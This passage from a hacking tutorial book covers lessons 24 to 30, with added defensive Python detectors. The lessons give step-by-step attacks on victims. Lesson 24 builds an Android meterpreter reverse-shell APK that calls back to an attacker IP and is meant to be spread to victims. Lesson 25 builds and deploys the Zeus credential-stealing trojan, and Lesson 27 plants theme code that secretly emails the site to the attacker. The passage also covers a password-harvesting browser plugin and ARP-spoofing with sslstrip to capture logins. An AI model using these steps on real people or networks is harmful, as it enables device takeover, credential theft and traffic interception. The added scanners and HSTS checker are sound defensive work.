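    513:  "login (rlogin): misconfigured to accept logins without proper authentication; disable, use ssh",
    514:  "shell (rsh): same family as rlogin; disable",
    1524: "ingreslock: an unauthenticated shell listens here on Metasploitable 2; remove",
}

# Constructed sample of what "nmap -sS 192.168.154.132" prints (truncated to a few ports).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.154.132
Host is up (0.00021s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
80/tcp   open  http
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1524/tcp open  ingreslock
"""


def parse_nmap(text):
    """Return (port, proto, state, service) tuples from Nmap normal output."""
    return [(int(port), proto, state, svc)
            for port, proto, state, svc in PORT_LINE_RE.findall(text)]


def triage(text):
    """Return {port: finding} for open ports that are on the known-risky list."""
    return {port: KNOWN_RISKY[port]
            for port, _proto, state, _svc in parse_nmap(text)
            if state == "open" and port in KNOWN_RISKY}


if __name__ == "__main__":
    for port, finding in sorted(triage(SAMPLE_NMAP_OUTPUT).items()):
        print(f"{port:>5}  {finding}")
```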
Lesson 24: Hacking Android
Nowadays the number of mobile users is increasing day by day, and the security threat is increasing together
with the growth of its user base. Our tutorial for today is how to hack Android smartphones using
Metasploit.
What is Android? According to Wikipedia:
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen
mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc.,
which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with
the founding of the Open Handset Alliance: a consortium of hardware, software, and
telecommunication companies devoted to advancing open standards for mobile devices.
And what is an APK? According to Wikipedia:
Android application package file (APK) is the file format used to distribute and install application
software and middleware onto Google's Android operating system; very similar to an MSI package in
Windows or a Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)
2. Android smartphone (we use HTC One android 4.4 KitKat)
Step by Step Hacking Android Smartphone Tutorial using Metasploit:
1. Open terminal
2. We will use the Metasploit payload framework to create the exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp
LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
As described above, the attacker IP address is 192.168.8.94; now execute the command.
3. Because our payload is reverse_tcp, where the attacker expects the victim to connect back to the attacker
machine, the attacker needs to set up a handler to handle incoming connections on the port already
specified above. Type msfconsole to go to the Metasploit console.
Info:
use exploit/multi/handler –> we will use the Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is
the same as in step 2
4. Next we need to configure the options for the Metasploit payload we already specified in
step 3.
Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen on for the reverse connection
exploit –> start listening for incoming connections
5. The attacker already has the APK file and now starts distributing it (I don't need to describe how
to distribute this file; the internet is a good place for distribution).
6. Long story short, the victim (myself) downloads the malicious APK file and installs it. After the victim
opens the application, the meterpreter session will open and the attack has begun.
7. This means that the attacker is already inside the victim's Android smartphone and can do everything
with the victim's phone.
Experiment with different commands at this point, for example:
webcam_list gives you a list of the cameras on the victim's device,
such as:
back camera
front camera
webcam_snap 2 would take a picture from one of the cameras.
Sneaky sneaky.
Conclusion:
1. Don't install APKs from unknown sources.
2. If you really want to install an APK from an unknown source, make sure you can view, read and
examine the source code.
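An added detection example, not part of the lesson: the reverse_tcp payload above speaks plain meterpreter on TCP 443, not TLS, so a network sensor can flag any client whose first bytes on 443 are not a TLS ClientHello. The flows below are constructed; the attacker address is the lesson's 192.168.8.94, the other addresses come from documentation ranges.

```python
def looks_like_tls_client_hello(first_bytes):
    """True if the first client->server bytes are a TLS handshake record carrying a
    ClientHello: record type 0x16, version 0x03 0x0X, handshake type 0x01 at offset 5."""
    if len(first_bytes) < 6:
        return False
    return (first_bytes[0] == 0x16
            and first_bytes[1] == 0x03
            and first_bytes[2] in (0x00, 0x01, 0x02, 0x03, 0x04)
            and first_bytes[5] == 0x01)


# Constructed flows: (client, server, dst_port, first client bytes).
SAMPLE_FLOWS = [
    # Normal HTTPS: TLS 1.0 record header, ClientHello handshake type, then length bytes.
    ("192.168.8.50", "203.0.113.10", 443, bytes.fromhex("16030100c5010000c1")),
    # The lesson's scenario: a phone connecting back to 192.168.8.94:443 without TLS.
    # The bytes are an arbitrary non-TLS stand-in, not a real meterpreter header.
    ("192.168.8.51", "192.168.8.94", 443, bytes.fromhex("00000040deadbeef")),
    # Plain HTTP on port 80 is expected to be non-TLS, so it must not be flagged.
    ("192.168.8.52", "203.0.113.10", 80, b"GET / HTTP/1.1\r\n"),
]


def flag_non_tls_on_443(flows):
    """Return (client, server) pairs whose port-443 flow does not start with a ClientHello."""
    return [(client, server) for client, server, port, first in flows
            if port == 443 and not looks_like_tls_client_hello(first)]


if __name__ == "__main__":
    for client, server in flag_non_tls_on_443(SAMPLE_FLOWS):
        print(f"non-TLS traffic on 443: {client} -> {server}")
```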
Lesson 25: Remote Administration Tool (RAT)
Today we will learn how to set up the Zeus BotNet Remote Administration Tool (RAT). We chose Zeus
because Zeus was one of the most famous trojan horses in history, infecting many servers
around 2007-2010.
If you don't know about Zeus, here is the definition from Wikipedia:
Zeus is a Trojan horse that steals banking information by Man-in-the-browser keystroke logging and
Form Grabbing. Zeus is spread mainly through drive-by downloads and phishing schemes. First
identified in July 2007 when it was used to steal information from the United States Department of
Transportation, it became more widespread in March 2009. In June 2009, security company Prevx
discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies
as the Bank of America, NASA, Monster.com, ABC, Oracle, Play.com, Cisco, Amazon, and
BusinessWeek.
In late 2010, a number of Internet security vendors including McAfee and Internet Identity claimed
that the creator of Zeus had said that he was retiring and had given the source code and rights to
sell Zeus to his biggest competitor, the creator of the SpyEye trojan. However, those same experts
warned the retirement was a ruse and expect the cracker to return with new tricks. As of 13 May
2011, the source code and compiled binaries are found to be hosted on GitHub.
Requirements:
1. Remote Administration Tool (RAT) Zeus BotNet
2. Web Server + Database Server (in this example we use XAMPP)
Remote Administration Tool (RAT) Zeus BotNet:
1. First, we need to install the web server and database server. Since we're using XAMPP for this
tutorial, you can refer to the previous step-by-step guide How to Install XAMPP in 7 Simple Steps to install
XAMPP on a Windows machine, and make sure your XAMPP Apache and MySQL services are started
and running.
2. Open the internet browser and type http://localhost/phpmyadmin. Input the username and
password; by default the username is root and the password is left empty. After that create a new
database. I named it bot, but you can change it to whatever you want. This database name will be
used for the installation of the remote administration tool.
3. Next we need to download the remote administration tool file and extract it; you will find 3
main folders: builder, other, and server[php]. Create a new folder inside C:\xampp\htdocs. I
gave the folder the name bot, then copied the server[php] contents into C:\xampp\htdocs\bot.
4. Now go back to the web browser and type http://localhost/bot/install into the
address bar. Fill in all required fields with the correct information.
Information:
– The host address for MySQL is filled with your database server IP address. If you run XAMPP it
should be your own IP address.
– Database is filled with the name of the database already created in step 2.
– The encryption key can be filled with any characters, with a length from 1 to 255.
Click Install to start installing.
Note: If you get this error
ERROR:Failed connect to MySQL server: Host 'myusername' is not allowed to connect to this
MySQL server
you need to do the following, step by step:
a. Open phpMyAdmin at http://localhost/phpmyadmin and click the Privileges tab.
Click the edit button to edit the root user privileges.
b. In the edit user page, scroll down and find the login information section. Change the Host
from localhost to Any host and press the Go button.
6. The next step is configuring and creating the Zeus bot client. Open the builder folder and
open the config.txt configuration file. Change
the url_config, url_loader and url_server settings according to your
IP address.
Note: don't forget to edit the path of webinjects.txt.
7. Now for the next step, open the zsb.exe file.
Click Builder, then click Browse, click "Build the bot configuration" under the Actions header, then build
the bot executable.
8. After building the bot config and bot executable in step 7, we now have two new
files, config.bin and bot.exe. Copy those two files into the htdocs folder. Mine was
inside C:\xampp\htdocs\bot.
9. Now let's say we send the generated bot.exe to the victim. After the victim executes the file we
can check our attacker server. Open the browser, type http://localhost/bot/cp.php and
enter your username and password.
10. We can see the newly infected victim in the web interface and can even view the desktop screenshot
of the victim.
Conclusion:
1. When a victim is infected, the attacker can gather a lot of information from the victim, including all
internet activities, and can even gather all website usernames and passwords, since this tool can act as
a keylogger and capture the login information.
2. To prevent infection by this trojan, always update your operating system and antivirus, and do not
click any link that looks suspicious in your mail or chat messenger.
Lesson 26: Hacking Basic HTTP Authentication using
Burp Suite
Hacking HTTP basic authentication with dictionary attacks using Burp Suite Free is our tutorial for today; we
will use a tool called Burp Suite.
If you have only just heard about Burp Suite, here is the explanation from their website:
Burp Suite is an integrated platform for performing security testing of web applications. Its various
tools work seamlessly together to support the entire testing process, from initial mapping and
analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art
automation, to make your work faster, more effective, and more fun.
Explanation of HTTP basic authentication:
HTTP supports several authentication mechanisms. Upon a request for a resource within a protected
space, the server should respond with an authentication challenge using the WWW-Authenticate header. In
order to receive authorization the client should send the requested identification information using the
Authorization header. When the client is not authorised, a 401 "Unauthorised" response status is
returned.
The simplest and most common HTTP authentication in use is Basic. The client needs to provide the
credentials as a Base64 encoded string username:password. If the credentials are correct
the web server returns the requested resource; otherwise the server repeats the authentication
challenge.
Requirements:
1. Download BURP suite at portswigger.net (in this tutorial I use the free edition) and install it.
2. Compose a basic PHP login script to use on the victim machine.
Hacking HTTP Basic Authentication Dictionary Attacks with Burp
Suite Free:
1. The PHP script from requirement number 2 is a simple login page. You can copy it to your
HTDOCS folder if you use XAMPP or WAMP for your web development platform.
2. Run Burp Suite and change your browser proxy settings to run through the Burp application.
By default Burp will use port 8080; if you don't know how to change the browser proxy settings, a
simple Google search can tell you how.
3. When the proxy is set up, we can access the login.php file. In this example, for testing
purposes, I will input username = test and password = test. When we click the submit button (LOG
IN), Burp will intercept the data.
Right click and choose "Send to Intruder".
4. On the INTRUDER –> POSITIONS tab, change the attack type to "Cluster Bomb".
5. After setting up the attack type, we can move to the PAYLOADS tab. To fill in the payloads,
see the picture on step 4.
Payload set 1 = PHPSESSID (the value)
We will set up the same PHPSESSID value, because the system uses a static PHPSESSID.
6. Now we will change payload set number two; we're still on the PAYLOADS tab.
Payload set 2 = username (the value)
You can load the username data from a username list. I input the usernames one by one.
7. In payload set three we will input the password.
Payload set 3 = password (the value)
On this step you can also load from a password list, but in the above example I input the passwords one
by one.
8. The last payload set to configure is the submit parameter.
Payload set 4 = submit (the value)
Since this submit parameter only checks whether the user clicked the button or not, we can make it the same value,
LOG+IN%21.
9. Every payload set has been configured successfully; now we will start the attack and
watch Burp Suite perform the attack automatically. Click Intruder and choose "Start Attack".
10. Burp Suite Intruder will check the usernames and passwords one by one. When there is a
matching username and password, you can see that the response length changed. From this example we
know that the username = admin and password = 123456.
Conclusion:
1. To prevent this kind of attack, as a user you can do nothing; as a developer you can do what the Gmail
anti brute force system does, where every attempt is logged by the system based on the client's IP address. If you
try to log in and fail several times, the system will force the user to solve a captcha.
2. As a developer you can also add a salt to the username and password to make the attack take much
longer, but in my opinion the first conclusion is better.
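An added example for the conclusion, not the lesson's code: decode_basic_auth() shows that a Basic Authorization header is only Base64, not encryption (the token below encodes the lesson's admin:123456), and FailureTracker implements the per-IP failure counting with a captcha threshold that conclusion 1 describes, replayed over a constructed Intruder-style attempt log.

```python
import base64
import binascii
from collections import defaultdict, deque


def decode_basic_auth(header_value):
    """Return (username, password) from 'Basic <base64>', or None if malformed."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")
    return (user, password) if sep else None


class FailureTracker:
    """Sliding-window count of failed logins per client IP."""

    def __init__(self, threshold=5, window_seconds=60):
        self.threshold = threshold
        self.window = window_seconds
        self.failures = defaultdict(deque)   # ip -> timestamps of recent failures

    def _prune(self, ip, now):
        q = self.failures[ip]
        while q and now - q[0] > self.window:
            q.popleft()
        return q

    def record_failure(self, ip, now):
        self._prune(ip, now).append(now)

    def needs_captcha(self, ip, now):
        """True once the IP has reached the threshold inside the window."""
        return len(self._prune(ip, now)) >= self.threshold


# Constructed attempt log: (timestamp, client ip, password correct?). Six Intruder-style
# failures from one address two seconds apart, then one failure from a different user.
SAMPLE_ATTEMPTS = [(t, "192.168.8.94", False) for t in range(0, 12, 2)] + [(13, "192.168.8.20", False)]


def replay(attempts, tracker=None):
    """Feed the attempts to a tracker and return the set of IPs that got a captcha."""
    tracker = tracker or FailureTracker()
    challenged = set()
    for ts, ip, ok in attempts:
        if tracker.needs_captcha(ip, ts):
            challenged.add(ip)
            continue            # serve the captcha instead of checking the password
        if not ok:
            tracker.record_failure(ip, ts)
    return challenged


if __name__ == "__main__":
    print(decode_basic_auth("Basic YWRtaW46MTIzNDU2"))
    print(replay(SAMPLE_ATTEMPTS))
```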
Lesson 27: Hacking WordPress – Send Secret Emails
From Malicious Layout Code About Site Info
Today's title is Hacking WordPress: Send Email Secretly About Website Information.
Requirements:
1. Understand PHP,
2. Know the WordPress functions,
3. Script to send email secretly (ask for the script when ready).
Step by step Hacking WordPress: Send Email Secretly About Website
Information:
1. We want to know the WordPress user information of a user. Let's see the following script:
2. The script in step one, if executed, will show the details of the active (logged in) WordPress user.
Execute this script on your local WordPress server; here is what I got:
Username: victim
Password: $P$BtwjqOL0j8USlI4htLLp0wnmizvaEB
User email: [email protected]
User first name:
User last name:
User display name: victim
User ID: 1
3. Even though we know the username and password hash, we still need time to crack
the password hash to get the plain password of the user.
In our last hacking tutorial about WordPress, WordPress hacking tutorials to add administrator user secretly,
we could add an administrator secretly by spreading malicious themes, but the problem is: "how do
we know who has already downloaded the malicious WordPress theme?"
4. To solve the problem in step three, we will combine this tutorial with WordPress
hacking tutorials to add administrator user secretly and send the URL address of the
infected website by inserting the following script.
5. When you see this email address, it's way too plain; what if we encode it using the base64_encode
PHP function? Here is the result.
6. The script I provide will send an email secretly to the attacker containing
the WordPress URL when the victim logs in and browses his/her WordPress website.
Conclusion:
1. Download WordPress themes only from a trusted source.
2. Buying is usually better than "free download".
3. Usually this kind of attack is found in premium WordPress themes (nulled edition or
warez); make sure you check the source code of the themes one by one to minimize the risk.
You can try to find the strings below in your theme code (especially nulled and warez
editions) to check whether it has malicious code or not:
base64_encode (most attackers use base64 encoding)
http:// (check where the URL is going),
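An added example, not the lesson's script: a scanner for the indicators listed above (base64 calls and http:// URLs in theme PHP) plus two related ones, eval() and mail()/wp_mail(); it also decodes base64 string literals so a URL hidden inside one is reported in the clear. The theme files are constructed samples written to a temporary directory.

```python
import base64
import binascii
import os
import re
import tempfile

INDICATORS = [
    ("base64", re.compile(r"\bbase64_(?:encode|decode)\s*\(")),
    ("eval",   re.compile(r"\beval\s*\(")),
    ("mail",   re.compile(r"\b(?:wp_)?mail\s*\(")),
    ("url",    re.compile(r"https?://[^\s'\"]+")),
]
# A quoted run of base64 alphabet characters long enough to be worth decoding.
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")


def hidden_urls(line):
    """Decode base64 string literals on the line; return those that contain a URL."""
    found = []
    for token in B64_LITERAL_RE.findall(line):
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if "://" in decoded:
            found.append(decoded)
    return found


def scan_source(path, text):
    """Return (path, line number, indicator, detail) tuples for one PHP source file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in INDICATORS:
            if not rx.search(line):
                continue
            findings.append((path, lineno, name, line.strip()[:80]))
            if name == "base64":
                for url in hidden_urls(line):
                    findings.append((path, lineno, "hidden-url", url))
    return findings


def scan_theme(root):
    """Scan every .php file under root (paths reported relative to root)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in sorted(files):
            if fn.endswith(".php"):
                full = os.path.join(dirpath, fn)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_source(os.path.relpath(full, root), fh.read()))
    return findings


# Constructed theme: the base64 literal decodes to http://example.invalid.
SAMPLE_THEME = {
    "functions.php": "<?php\n$x = base64_decode('aHR0cDovL2V4YW1wbGUuaW52YWxpZA==');\n"
                     "mail($x, 'site', get_site_url());\n",
    "header.php": "<?php wp_head(); ?>\n<link href=\"http://fonts.example.invalid/css\">\n",
    "style.css": "/* no PHP here, so it is skipped */\n",
}


def scan_sample_theme():
    with tempfile.TemporaryDirectory() as root:
        for name, content in SAMPLE_THEME.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan_theme(root)


if __name__ == "__main__":
    for path, lineno, kind, detail in scan_sample_theme():
        print(f"{path}:{lineno}: {kind}: {detail}")
```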
Lesson 28: Reveal Asterisk Saved Passwords
We will learn how to reveal the password behind the asterisks in Mozilla Firefox and Google Chrome without looking at the
saved password in the browser options menu.
If you have never heard about Firebug, here is the description from Wikipedia:
Firebug is a web development tool that facilitates the debugging, editing, and monitoring of
any website's CSS, HTML, DOM, XHR, and JavaScript; it also provides other web development
tools. Firebug's JavaScript panel can log errors, profile function calls, and enable the developer to
run arbitrary JavaScript. Its net panel can monitor URLs that the browser requests, such as
external CSS, JavaScript, and image files. The net panel can display both request headers and
response headers for each page asset; it can also estimate the time each asset took to load.
Requirements:
1. Mozilla Firefox with the Firebug add-on.
2. Google Chrome.
Step by step to Reveal Asterisk Saved Passwords on Mozilla
Firefox and Chrome:
1. Open the Mozilla Firefox browser,
press ALT –> click Tools –> click Add-ons
2. On the Add-ons page there is a search box; type firebug in the textbox and click search, or you
can go directly to this page: https://addons.mozilla.org/en-US/firefox/addon/firebug/.
Click Install if a pop-up window asks you to install this add-on,
and restart your browser.
3. This is the Firebug button. To activate Firebug you only need to click this button, and click once
again to deactivate it.
4. Now we try to open a website with a login page, e.g. mail.live.com, and input the password. Right
click on the password box and choose Inspect Element.
5. Double click the type="password" and change it into type="text".
6. The password behind the asterisks will be shown and revealed.
7. What if it is in the Google Chrome browser? The steps are the same.
Open the login page, right click the password box and choose Inspect Element.
8. Change the input type="password" to type="text".
The password is revealed.
Lesson 29: Hacking Internet User’s Passwords Using
‘Malicious’ Firefox Plugin.
The title Hacking Internet Users' Passwords Using a Malicious Firefox Plugin came about after some
students asked about the possibility of gathering usernames and passwords from a browser plugin.
The answer is yes: you can gather a username and password from internet users when they have
installed a malicious plugin.
According to Wikipedia, a plugin is:
In computing, a plug-in (or plugin, extension) is a software component that adds a specific feature to
an existing software application. When an application supports plug-ins, it enables customization.
The common examples are the plug-ins used in web browsers to add new features such as search
engines, virus scanners, or the ability to utilize a new file type such as a new video format.
In this case, the attacker will
change, add, modify or create the main function of a Firefox plugin and override or rewrite some
functions to do malicious activities that benefit the attacker.
Requirements:
1. Firefox malicious plugin
2. Understand Javascript
3. Social Engineering
How to Hack Internet Users' Passwords Using a Malicious Firefox
Plugin:
The victim's browser, which has a malicious Firefox plugin installed, is accessing the internet. As the
victim browses the internet, the infected browser also sends the data to the attacker's server.
The data is which websites the victim visited, and it sends the username and password as well.
The attacker's harvester website grabs all GET or POST requests and stores them in a simple TXT file,
but it can be changed to a database server as well.
Conclusion:
1. Make sure you download plugins only from a trusted source (e.g. http://addons.mozilla.org/).
Lesson 30: Breaking SSL Encryption
Level: Medium, Advanced
Some people ask, "Are you sure SSL (Secure Socket Layer) on port 443 can be hacked, so that we know
the password sent over the network?" How do you break SSL protection using sslstrip?
What is SSL?
Actually, if you see my explanation about SSL in my previous post, when we try to break
the encryption it's a little bit hard to break, but in this tutorial I will explain how to break
the SSL protection without breaking the SSL encryption, using a Man in the Middle Attack :-).
Man in the Middle Attack
Requirements:
1. Kali Linux
2. Arpspoof
3. IPTables
4. SSLStrip
5. NetStat
SSLStrip may need to be downloaded and installed.
Perform the Attack – Man in the Middle Attack
1. Set your Linux box so it can forward every incoming packet (enable IP forwarding).
echo '1' > /proc/sys/net/ipv4/ip_forward
This command gives your BackTrack/Kali Linux box the ability to forward every packet that was not intended for
your machine.
2. Know your network gateway
netstat -nr
For example, I already know that my gateway address is 192.168.8.8.
3. Use ARP spoof to perform the Man in the Middle Attack
arpspoof -i eth0 192.168.8.8
a. Change "eth0" to the network card that is currently connected to the network. Usually it
is eth0 or wlan0.
b. Change "192.168.8.8" to your network's default gateway.
c. In this tutorial I use arpspoof on the entire network. Be careful if your network has a large user base
connected to it, because it will crash your network and bring the network down.
SSL Strip
Created by Moxie Marlinspike, who provided a demonstration of the HTTPS stripping attacks
presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch
for HTTPS links and redirects, then map those links into either look-alike HTTP links or
homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon,
selective logging, and session denial. - Taken from the author's website
This all happens on the fly, and is practically invisible to users. The only way to notice is by
checking the URL in the address bar: where normally it would display HTTPS, it will now
display HTTP instead.
Install SSL Strip (optional)
1. Download SSL Strip
2. tar zxvf sslstrip-0.9.tar.gz
3. cd sslstrip-0.9
4. python setup.py install
Break SSL Protection Using SSLStrip and Kali Linux
1. We need to set up a firewall rule (using iptables) to redirect requests from port 80 to port 8080, to
ensure our outgoing connections (from SSL Strip) get routed to the proper port.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
2. After setting up iptables, the next step is to redirect all network HTTP traffic through
our computer using ARPSpoof (don't forget to enable IP forwarding).
echo '1' > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 192.168.8.8
3. When everything is running well, you will see ARPSpoof capturing network traffic; the next
step is to start SSL Strip by opening a new terminal (CTRL+ALT+T):
sslstrip -l 8080
"-l" tells the program to listen on the specified port.
SSL Strip is now running and waiting for the victim to open an SSL URL such as
(https://mail.google.com; https://mail.yahoo.com; etc.)
As a victim I will try to open https://mail.live.com. When I open the page, I expect the URL to
no longer be in secure socket layer.
The URL changed into HTTP.
4. After SSL Strip has captured enough data, to stop ARPSpoof and SSL Strip just hit CTRL + C. After
you stop it, the whole network will be down and cannot be accessed for a while (it shouldn't take
a long time); this happens because ARPSpoof doesn't automatically repopulate the ARP tables with the
router's proper MAC address.
5. Inside the SSL Strip folder there will be a new file, "sslstrip.log", that stores all
information captured over the HTTP protocol and even HTTPS. Just take a look at
the file using your favorite text editor. The picture below is the content of my sslstrip.log, which
captured the victim's data when they opened https://mail.live.com.
You can see the plain data of the username and password there in the log.
Prevention of SSL Strip Attack
1. If you are on a public network (internet cafe, unsecured hotspot, etc.), minimize logging into your
personal accounts.
2. Use SSH Tunneling
3. Keep your eyes open.
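An added example, not part of the lesson: the server-side countermeasure to SSL Strip is HTTP Strict Transport Security, which makes a browser that has already seen the site refuse a plain http:// request for it. check_hsts() grades a constructed Strict-Transport-Security header and hsts_would_block() applies a cached policy the way a browser would; the host names are constructed.

```python
MIN_MAX_AGE = 31536000   # one year, the usual minimum for a real deployment


def parse_hsts(value):
    """Parse 'max-age=N; includeSubDomains; preload' into a dict; None if max-age is missing."""
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        name = name.lower()
        val = val.strip().strip('"')
        if name == "max-age" and val.isdigit():
            policy["max_age"] = int(val)
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    return policy if policy["max_age"] is not None else None


def check_hsts(headers):
    """Return a list of problems with the response's HSTS policy (empty list = fine)."""
    value = next((v for k, v in headers.items()
                  if k.lower() == "strict-transport-security"), None)
    if value is None:
        return ["no Strict-Transport-Security header: sslstrip works on every visit"]
    policy = parse_hsts(value)
    if policy is None:
        return ["malformed header (missing max-age): browsers ignore it"]
    problems = []
    if policy["max_age"] == 0:
        problems.append("max-age=0 clears the policy")
    elif policy["max_age"] < MIN_MAX_AGE:
        problems.append(f"max-age {policy['max_age']} is shorter than one year")
    if not policy["include_subdomains"]:
        problems.append("includeSubDomains missing: subdomains can still be stripped")
    if not policy["preload"]:
        problems.append("not preloaded: the very first visit is still unprotected")
    return problems


def hsts_would_block(policy, host, cached_host, seen_at, now):
    """True if a browser holding 'policy' for cached_host (learned at time seen_at)
    would refuse a plain http:// request to host at time now."""
    if now - seen_at > policy["max_age"]:
        return False                       # policy expired
    if host == cached_host:
        return True
    return policy["include_subdomains"] and host.endswith("." + cached_host)


# Constructed responses: no policy, a weak one, and a strong one.
SAMPLE_RESPONSES = {
    "no-hsts": {"Content-Type": "text/html"},
    "weak":    {"Strict-Transport-Security": "max-age=300"},
    "good":    {"Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload"},
}


if __name__ == "__main__":
    for name, headers in SAMPLE_RESPONSES.items():
        print(name, check_hsts(headers) or ["ok"])
```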
Remember This!
Don't use this for anything other than educational purposes or on a server with permission from a
client. Don't be shocked if this application gets you sent to jail faster should you use it for a purpose
the law considers unintended.